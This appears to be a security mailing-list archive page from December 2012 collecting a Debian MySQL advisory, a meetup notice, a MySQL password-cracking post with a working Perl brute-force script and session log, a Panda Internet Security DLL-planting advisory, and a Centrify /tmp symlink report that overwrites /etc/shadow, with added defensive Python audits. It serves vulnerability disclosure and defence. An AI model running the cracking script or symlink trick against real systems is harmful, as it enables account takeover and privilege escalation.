[SECURITY] [DSA 2581-1] mysql-5.1 security update

2012-12-04 Thread Yves-Alexis Perez
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2581-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
December 04, 2012  http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: mysql-5.1
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3150 CVE-2012-3158 CVE-2012-3160 CVE-2012-3163 
 CVE-2012-3166 CVE-2012-3167 CVE-2012-3173 CVE-2012-3177
 CVE-2012-3180 CVE-2012-3197 CVE-2012-5611
Debian Bug : 690778 695001

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream version,
5.1.66, which includes additional changes, such as performance improvements and
corrections for data loss defects.  These changes are described in the MySQL
release notes at: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html

For the testing distribution (wheezy) and unstable distribution (sid), these
problems have been fixed in version 5.5.28+dfsg-1.

Additionally, CVE-2012-5611 has been fixed in this upload. The vulnerability
(discovered independently by Tomas Hoger from the Red Hat Security Response
Team and king cope) is a stack-based buffer overflow in acl_get() when
checking user access to a database. Using a carefully crafted database name, an
already authenticated MySQL user could make the server crash or even execute
arbitrary code as the mysql system user.

For the stable distribution (squeeze), this problem has been fixed in version
5.1.66-0+squeeze1.

For the testing distribution (wheezy) and unstable distribution (sid), this
problem will be fixed soon.

We recommend that you upgrade your mysql-5.1 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iQEcBAEBCgAGBQJQvZ/WAAoJEG3bU/KmdcClarEIAJ9nKbUELxjb1eksmEGOXkYr
x2WM+6XPVAN+4JKwwFyXCNYJbTPG5J3EM090YguqfnoWvVHZaPbcciymDOyNwPh3
x9Dm7lBNla2/fPvgEsA8enGaQdIrHnOy13Lj4e4Mu/3g1nSBp0eGZIVT6TVy9BJO
Hiqds0BZDqHuG/SGtWNsMLs6dMH4iYVcvcK3NFyFh6zt8O73Cbe0xIYDDuwO0uwj
HoUk6WxK2qs7auir+XkAShdQAj7KjL7Zs3LmLPaH1oUKvRD/IYJw14NRkdeU8CC5
Jz9sdTICSYxYe11zITXYdF4UYRLpF7W8jW6WDPM5kkZWPTjtUkUB0jcdeFQP6v4=
=D3mt
-----END PGP SIGNATURE-----
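
As an added example that is not part of the advisory: a small Python re-implementation of dpkg's version ordering (epoch, upstream, Debian revision, '~' sorting before everything), so a version string read from dpkg can be compared against the fixed versions named above (5.1.66-0+squeeze1 for squeeze, 5.5.28+dfsg-1 for wheezy/sid). The sample dpkg output and the 5.1.61 version in it are constructed for the demo; on a real host feed it the output of dpkg-query -W -f='${Package} ${Version}\n' 'mysql-server*'.

```python
import re

# Added illustrative check; not from the Debian advisory and not dpkg's own code.
# It reimplements dpkg's version comparison so an inventory can be audited
# against the fixed versions named in DSA-2581-1.

FIXED_SQUEEZE = "5.1.66-0+squeeze1"   # stable, from the advisory
FIXED_WHEEZY_SID = "5.5.28+dfsg-1"    # testing/unstable, from the advisory


def _order(c):
    """dpkg's character weight for the non-digit parts of a version."""
    if c == "~":
        return -1            # '~' sorts before anything, even end of string
    if c.isalpha():
        return ord(c)
    return ord(c) + 256      # other punctuation sorts after letters


def _cmp_nondigit(a, b):
    for i in range(max(len(a), len(b))):
        wa = _order(a[i]) if i < len(a) else 0   # end of string weighs 0
        wb = _order(b[i]) if i < len(b) else 0
        if wa != wb:
            return -1 if wa < wb else 1
    return 0


def _cmp_fragment(a, b):
    """Compare an upstream or revision string: alternate non-digit and numeric runs."""
    while a or b:
        na, nb = re.match(r"\D*", a).group(), re.match(r"\D*", b).group()
        r = _cmp_nondigit(na, nb)
        if r:
            return r
        a, b = a[len(na):], b[len(nb):]
        da, db = re.match(r"\d*", a).group(), re.match(r"\d*", b).group()
        ia, ib = int(da or "0"), int(db or "0")
        if ia != ib:
            return -1 if ia < ib else 1
        a, b = a[len(da):], b[len(db):]
    return 0


def parse_version(v):
    """Split 'epoch:upstream-revision' the way dpkg does."""
    epoch = 0
    if ":" in v:
        e, v = v.split(":", 1)
        epoch = int(e)
    revision = ""             # dpkg compares a missing revision as empty
    if "-" in v:
        v, revision = v.rsplit("-", 1)
    return epoch, v, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 with the same ordering as dpkg --compare-versions."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    return _cmp_fragment(ua, ub) or _cmp_fragment(ra, rb)


def is_fixed(installed, fixed):
    return compare_versions(installed, fixed) >= 0


# Constructed sample of `dpkg-query -W -f='${Package} ${Version}\n' 'mysql-server*'`
# from a hypothetical squeeze host; the 5.1.61 version is made up for the demo.
SAMPLE_DPKG = """\
mysql-server-5.1 5.1.61-0+squeeze1
mysql-server 5.1.61-0+squeeze1
"""


def audit(dpkg_output, fixed=FIXED_SQUEEZE):
    """Map each package to whether its version is at or above the fixed one."""
    result = {}
    for line in dpkg_output.splitlines():
        if not line.strip():
            continue
        pkg, ver = line.split(None, 1)
        result[pkg] = is_fixed(ver.strip(), fixed)
    return result


if __name__ == "__main__":
    for pkg, ok in audit(SAMPLE_DPKG).items():
        print(f"{pkg}: {'fixed' if ok else 'VULNERABLE, upgrade to ' + FIXED_SQUEEZE}")
```

On the host itself, dpkg --compare-versions 5.1.61-0+squeeze1 lt 5.1.66-0+squeeze1 gives the same answer; the point of having the ordering in code is to run it over collected inventories from many hosts without a dpkg on the auditing machine. Note that the binary package is mysql-server-5.1 while the advisory names the source package mysql-5.1.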



DC4420 - London DEFCON - Christmas 2012 meet! Tuesday 11th December 2012

2012-12-04 Thread Major Malfunction

Hard to believe, but 2012 is almost over

Once again we've managed to secure the venue for a December meet, so we 
can start the festivities well before your livers are too crippled by 
office parties... Not only that, but we've even got a speaker lined up!


Chris from Facebook London's Site Integrity Engineering Team will be 
giving us:


Why root the kernel when you can just install a toolbar?

Chris will give a brief overview of the major attacks against Facebook 
and then deep dive on a trend towards browser malware that they really 
saw gain traction last year.


... and then we'll do some serious Christmas drinking!

DOWNSTAIRS @ The Phoenix, Cavendish Square

  http://www.phoenixcavendishsquare.co.uk/

Talk starts at 19:30, but the venue is ours from much earlier... food is 
good and beer is cold!


See you next week!

cheers,
MM

p.s. if you have any potential talks for next year please email:

mailto:ta...@dc4420.org?subject=DC4420%20Talk
--
In DEFCON, we have no names... errr... well, we do... but silly ones...


MySQL Local/Remote FAST Account Password Cracking

2012-12-04 Thread king cope
FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks a lot like a
minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the
network pretty efficiently.
During tests it was possible to test 5000 passwords per second over the network.
The method is as follows:

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user; this command can be used,
as the name suggests, to change the user during a mysql session.
Since mysql is very fast in doing this, it is much more powerful for cracking
passwords than reconnecting to the mysql server every time to brute force
passwords (which would be VERY slow).
Since the SALT does not change in the change_user command (and this is the
weak point), it is a convenient way to crack passwords. (When connecting to
mysql, the SALT is different in each connection attempt and is sent out by
the server.)

Below is an example script and an example which uses John the Ripper's
capabilities
to generate passwords.

The password 'pass' for the user 'crackme' is cracked in a matter of seconds.
(about 10 passwords are tested in 20 seconds)
---
cracking script

use strict;
use Net::MySQL;

$| = 1;

# Log in once with any low-privileged account. The server sends its 20-byte
# salt in the handshake and Net::MySQL keeps it in $mysql->{salt}; it does
# not change for the rest of the session.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => 'user',
    password => 'secret',
    debug    => 0,
);

my $crackuser = 'crackme';

# Candidate passwords arrive one per line on STDIN (e.g. from john --stdout).
while (<STDIN>) {
    chomp;
    my $currentpass = $_;

    # COM_CHANGE_USER payload: user, "\0", length byte 0x14, the 20-byte
    # scramble of the candidate over the session salt, then "\0" (empty db).
    my $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt},
            $mysql->{client_capabilities}
        ) . "\0";

    # "\x11" is COM_CHANGE_USER. _execute_command is a Net::MySQL internal;
    # as in the original check ($reply ne undef), an undefined or empty reply
    # is treated as the server rejecting the credentials.
    my $reply = $mysql->_execute_command("\x11", $vv);
    if (defined $reply && $reply ne '') {
        print "[*] Cracked! -- $currentpass\n";
        exit;
    }
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! -- pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

Greetings,

Kingcope
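
As an added example (not kingcope's script, and it talks to no server): the mysql_native_password arithmetic that the Perl loop above delegates to Net::MySQL::Password->scramble, plus the COM_CHANGE_USER payload the loop builds, with the server's side of the check written out so the whole exchange can be run offline. The user row, salt and candidate list are constructed; nothing here is MySQL's own code.

```python
import hashlib
import hmac
import os

# Added example: both sides of a COM_CHANGE_USER guess under
# mysql_native_password, computed offline. Not kingcope's code, not MySQL's.

COM_CHANGE_USER = 0x11   # the command byte the script sends as "\x11"
SCRAMBLE_LEN = 20        # the 0x14 length byte in the script


def _sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_password_hash(password: str) -> str:
    """What mysql.user stores: '*' + hex(SHA1(SHA1(password)))."""
    return "*" + _sha1(_sha1(password.encode())).hex().upper()


def scramble_native(password: str, salt: bytes) -> bytes:
    """Client side: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    stage1 = _sha1(password.encode())
    stage2 = _sha1(stage1)
    mask = _sha1(salt + stage2)
    return bytes(x ^ y for x, y in zip(stage1, mask))


def server_check(scramble: bytes, salt: bytes, stored_hash: str) -> bool:
    """Server side: unmask with the stored SHA1(SHA1(pw)), re-hash, compare.
    The server never needs the password itself, only the stored double hash."""
    stage2 = bytes.fromhex(stored_hash[1:])
    mask = _sha1(salt + stage2)
    stage1 = bytes(x ^ y for x, y in zip(scramble, mask))
    return hmac.compare_digest(_sha1(stage1), stage2)


def build_change_user(user: str, password: str, salt: bytes, db: str = "") -> bytes:
    """COM_CHANGE_USER payload as the script assembles it:
    0x11, user\\0, length byte 0x14, 20-byte scramble, db\\0."""
    scramble = scramble_native(password, salt)
    assert len(scramble) == SCRAMBLE_LEN
    return (bytes([COM_CHANGE_USER]) + user.encode() + b"\0"
            + bytes([SCRAMBLE_LEN]) + scramble + db.encode() + b"\0")


def parse_change_user(payload: bytes):
    """Server-side view of the same payload: returns (user, scramble, db)."""
    assert payload[0] == COM_CHANGE_USER
    nul = payload.index(b"\0", 1)
    user = payload[1:nul].decode()
    n = payload[nul + 1]
    scramble = payload[nul + 2:nul + 2 + n]
    db_start = nul + 2 + n
    db = payload[db_start:payload.index(b"\0", db_start)].decode()
    return user, scramble, db


def guess_online(stored_hash: str, salt: bytes, candidates):
    """Simulate the loop: one COM_CHANGE_USER per candidate, same salt every
    time, no new handshake. Returns (password or None, guesses_sent)."""
    sent = 0
    for cand in candidates:
        payload = build_change_user("crackme", cand, salt)
        sent += 1
        _, scr, _ = parse_change_user(payload)   # what the server decodes
        if server_check(scr, salt, stored_hash):
            return cand, sent
    return None, sent


if __name__ == "__main__":
    salt = os.urandom(SCRAMBLE_LEN)        # handshake salt, constant for the session
    stored = mysql_password_hash("pass")   # constructed row for user 'crackme'
    print(guess_online(stored, salt, ["citcH", "rap", "matc3", "4429", "pass"]))
```

What this makes visible: each guess costs three SHA1 computations on either side, and because the session salt is held constant the client can emit COM_CHANGE_USER packets back to back instead of paying a full reconnect and handshake per candidate, which is where the rate reported in the post comes from. Newer servers also accept a character-set field and auth plugin name after the database name; the script omits them, as does this payload.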


Privilege Escalation through Binary Planting in Panda Internet Security

2012-12-04 Thread by_argos

Software: Panda Internet Security 2012 & 2013
Vendor: http://www.pandasecurity.com/
Vuln Type: Binary Planting Attack
Remote: No
Local: Yes
Discovered by: QSecure and Demetris Papapetrou
Website: http://www.qsecure.com.cy
Discovered: 09/09/2012
Reported: 19/11/2012
Disclosed: 04/12/2012
Vendor's Response: Automatically Generated Email
Vulnerability Reference: 
http://www.qsecure.com.cy/advisories/binary_planting_in_panda.html

VULNERABILITY DESCRIPTION:
==========================
As a result of an incorrect dynamic link library (DLL) loading in Panda 
Internet Security, an attacker with user level access to the machine can 
elevate his/her privileges to SYSTEM.

This can be accomplished by planting a malicious DLL file in a writable folder 
that is part of the system's %PATH% variable. The malicious DLL is loaded when 
the vulnerable Panda service or the system is restarted.

The following DLLs are insecurely loaded by Panda Internet Security 2013:

Insecure DLL     Vulnerable Service
------------     ------------------
Pavshld.dll      PsCtrls.exe, PsImSvc.exe, PavFnSvr.exe, PskSvc.exe
ImFilter.dll2    PsImSvc.exe
ImFilter.dll3    PsImSvc.exe
ImFilter.dll4    PsImSvc.exe

In addition to the above DLLs, Panda Internet Security 2012 also loads ham.dll 
insecurely.
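
An added check, not part of the QSecure advisory: walk the PATH entries a DLL search would consult and report which ones the current user can create files in, which is the precondition the advisory describes. It actually creates and removes a test file rather than trusting os.access(), which does not model Windows ACLs, and is written portably; run it on the Windows host as the low-privileged user being assessed. The demo PATH is constructed; Pavshld.dll is the name from the advisory's table.

```python
import os
import tempfile

# Added audit script, not from the advisory. Classifies each PATH entry as a
# place where a local user could plant a DLL for a higher-privileged loader.

DLLS_FROM_ADVISORY = ["Pavshld.dll"]   # name taken from the table above


def can_create_file(directory: str) -> bool:
    """Create and remove a file for real; os.access() lies about Windows ACLs."""
    try:
        fd, name = tempfile.mkstemp(dir=directory)
    except OSError:
        return False
    os.close(fd)
    os.unlink(name)
    return True


def nearest_existing_ancestor(path: str) -> str:
    while not os.path.isdir(path):
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return path


def classify_entry(entry: str) -> str:
    """'writable'  : exists and this user can create files in it
       'creatable' : missing, but the closest existing ancestor is writable,
                     so the user can create the directory and then plant the DLL
       'ok'        : neither"""
    entry = os.path.expandvars(entry)
    if os.path.isdir(entry):
        return "writable" if can_create_file(entry) else "ok"
    if can_create_file(nearest_existing_ancestor(entry)):
        return "creatable"
    return "ok"


def audit_path(path_value: str, sep: str = os.pathsep):
    """Keep search order: an earlier plantable entry beats a later legitimate one."""
    return [(e, classify_entry(e)) for e in path_value.split(sep) if e]


def planting_targets(path_value: str, dll_names, sep: str = os.pathsep):
    """Full paths where a local user could drop one of the named DLLs."""
    return [os.path.join(e, d)
            for e, state in audit_path(path_value, sep) if state != "ok"
            for d in dll_names]


def demo():
    """Constructed PATH: a fresh temp dir (writable) and a missing subdir of it
    (creatable). Returns the states in order and the planting targets."""
    base = tempfile.mkdtemp(prefix="pathaudit-")
    missing = os.path.join(base, "gone")
    path_value = os.pathsep.join([base, missing])
    states = [state for _, state in audit_path(path_value)]
    return states, planting_targets(path_value, DLLS_FROM_ADVISORY)


if __name__ == "__main__":
    for entry, state in audit_path(os.environ.get("PATH", "")):
        print(f"{state:9} {entry}")
    print(demo())
```

A 'creatable' entry (a PATH directory that no longer exists but whose parent is writable) matters as much as a 'writable' one, since the attacker can create the directory and then the DLL. On the application side the fix is to load the DLL by full path, or via LoadLibraryEx with LOAD_LIBRARY_SEARCH_SYSTEM32, so that PATH is never consulted.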


Centrify Deployment Manager v2.1.0.283

2012-12-04 Thread larry0

While at a training session for centrify, I noticed poor handling of files in 
/tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput.

I am sure there are more vulnerabilities to be exploited, maybe a local root, 
but since this is a training class I should probably focus.

total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rw-rw-r-- 1 clyde clyde     188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6680
-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6688
-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde     132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh

# ln -s /etc/shadow adcheckDMoutput

After run:

# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec  3 14:56 /etc/shadow

/etc/shadow has been overwritten with the contents of adcheckDMoutput.

I am also assuming the .210 appended to the end of files in /tmp is the major 
version number.

Larry W. Cashdollar
@_larry0 
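
An added demonstration, not Centrify's code: the write pattern the listings above imply (a root process opening the fixed name adcheckDMoutput in the shared /tmp for writing), reproduced in a scratch directory with a stand-in file in place of /etc/shadow, beside the two forms that defeat a planted symlink. All paths and file contents are constructed.

```python
import os
import tempfile

# Added example; not Centrify's code. Reproduces the /tmp symlink problem from
# the post in a scratch directory and shows two ways of writing that refuse
# a pre-planted link.

OUTPUT_NAME = "adcheckDMoutput"   # fixed, predictable name from the post


def _read(path: str) -> str:
    with open(path) as f:
        return f.read()


def write_output_unsafe(tmpdir: str, data: str) -> str:
    """What the listings suggest: open a fixed name in a shared directory for
    writing. open() follows a symlink an unprivileged user planted there, so
    the link target is truncated and overwritten with our data."""
    path = os.path.join(tmpdir, OUTPUT_NAME)
    with open(path, "w") as f:
        f.write(data)
    return path


def write_output_checked(tmpdir: str, data: str) -> str:
    """Refuse anything already at the path: O_CREAT|O_EXCL fails with EEXIST on
    an existing file or symlink (even a dangling one). O_NOFOLLOW is extra
    belt-and-braces where the platform offers it."""
    path = os.path.join(tmpdir, OUTPUT_NAME)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def write_output_private(data: str) -> str:
    """Better still: a mode-0700 directory with an unpredictable name, so no
    other user can plant anything next to the output in the first place."""
    private = tempfile.mkdtemp(prefix="adcheck-")
    fd, path = tempfile.mkstemp(dir=private, prefix=OUTPUT_NAME)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Stage the attack in a scratch dir standing in for /tmp. Returns
    (victim_overwritten_by_unsafe_write, checked_write_refused, victim_untouched_after)."""
    scratch = tempfile.mkdtemp(prefix="tmp-demo-")
    victim = os.path.join(scratch, "shadow")   # stands in for /etc/shadow
    original = "root:$6$constructed$:15678:0:99999:7:::\n"   # constructed content
    with open(victim, "w") as f:
        f.write(original)

    # The unprivileged user plants the link before the root-run tool writes.
    os.symlink(victim, os.path.join(scratch, OUTPUT_NAME))

    write_output_unsafe(scratch, "adcheck output\n")
    overwritten = _read(victim) == "adcheck output\n"

    # Restore the victim, then show the checked variant refuses the planted link.
    with open(victim, "w") as f:
        f.write(original)
    try:
        write_output_checked(scratch, "adcheck output\n")
        refused = False
    except FileExistsError:
        refused = True

    private_path = write_output_private("adcheck output\n")
    untouched = _read(victim) == original and os.path.isfile(private_path)
    return overwritten, refused, untouched


if __name__ == "__main__":
    print(demo())
```

O_CREAT|O_EXCL is the key: POSIX makes that open fail with EEXIST when anything, including a dangling symlink, already sits at the path, so a planted link can no longer redirect the write. The listings also show adcheckDMoutput being created 0666 and root-owned; even without the symlink that lets any local user alter it.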


Centrify Deployment Manager v2.1.0.283

2012-12-04 Thread larry0
This is actually the login UID of the user Deployment manager is being run as.
